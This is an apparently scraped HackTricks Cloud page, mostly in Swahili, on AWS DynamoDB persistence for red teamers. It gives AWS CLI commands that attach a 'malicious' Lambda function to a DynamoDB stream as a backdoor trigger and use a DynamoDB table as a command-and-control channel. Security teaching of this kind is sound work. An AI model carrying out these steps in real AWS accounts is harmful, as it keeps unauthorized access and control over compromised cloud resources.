AWS - DynamoDB Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

DynamoDB

Kwa maelezo zaidi, tembelea:

AWS - DynamoDB Enum

DynamoDB Triggers with Lambda Backdoor

Kwa kutumia vichocheo vya DynamoDB, mshambuliaji anaweza kuunda mlango wa siri kwa kuunganisha kazi ya Lambda yenye uharibifu na jedwali. Kazi ya Lambda inaweza kuchochewa wakati kipengee kinapoongezwa, kubadilishwa, au kufutwa, ikiruhusu mshambuliaji kutekeleza msimbo wowote ndani ya akaunti ya AWS.

# Create a malicious Lambda function
aws lambda create-function \
--function-name MaliciousFunction \
--runtime nodejs14.x \
--role <LAMBDA_ROLE_ARN> \
--handler index.handler \
--zip-file fileb://malicious_function.zip \
--region <region>

# Associate the Lambda function with the DynamoDB table as a trigger
aws dynamodbstreams describe-stream \
--table-name TargetTable \
--region <region>

# Note the "StreamArn" from the output
aws lambda create-event-source-mapping \
--function-name MaliciousFunction \
--event-source <STREAM_ARN> \
--region <region>

Ili kudumisha uvumilivu, mshambuliaji anaweza kuunda au kubadilisha vitu katika meza ya DynamoDB, ambayo itasababisha kazi ya Lambda yenye uharibifu. Hii inamruhusu mshambuliaji kutekeleza msimbo ndani ya akaunti ya AWS bila mwingiliano wa moja kwa moja na kazi ya Lambda.

DynamoDB kama Kituo cha C2

Mshambuliaji anaweza kutumia meza ya DynamoDB kama kituo cha amri na udhibiti (C2) kwa kuunda vitu vyenye amri na kutumia mifano iliyovunjika au kazi za Lambda kupata na kutekeleza amri hizi.

# Create a DynamoDB table for C2
aws dynamodb create-table \
--table-name C2Table \
--attribute-definitions AttributeName=CommandId,AttributeType=S \
--key-schema AttributeName=CommandId,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--region <region>

# Insert a command into the table
aws dynamodb put-item \
--table-name C2Table \
--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
--region <region>

Mifano iliyovunjwa au kazi za Lambda zinaweza kuangalia mara kwa mara jedwali la C2 kwa amri mpya, kuzitekeleza, na kwa hiari kuripoti matokeo nyuma kwenye jedwali. Hii inamruhusu mshambuliaji kudumisha uvumilivu na udhibiti juu ya rasilimali zilizovunjwa.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - Cognito Persistence NextAWS - EC2 Persistence

Last updated 3 days ago

# Create a malicious Lambda function aws lambda create-function \ --function-name MaliciousFunction \ --runtime nodejs14.x \ --role <LAMBDA_ROLE_ARN> \ --handler index.handler \ --zip-file fileb://malicious_function.zip \ --region <region> # Associate the Lambda function with the DynamoDB table as a trigger aws dynamodbstreams describe-stream \ --table-name TargetTable \ --region <region> # Note the "StreamArn" from the output aws lambda create-event-source-mapping \ --function-name MaliciousFunction \ --event-source <STREAM_ARN> \ --region <region>

# Create a DynamoDB table for C2 aws dynamodb create-table \ --table-name C2Table \ --attribute-definitions AttributeName=CommandId,AttributeType=S \ --key-schema AttributeName=CommandId,KeyType=HASH \ --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ --region <region> # Insert a command into the table aws dynamodb put-item \ --table-name C2Table \ --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \ --region <region>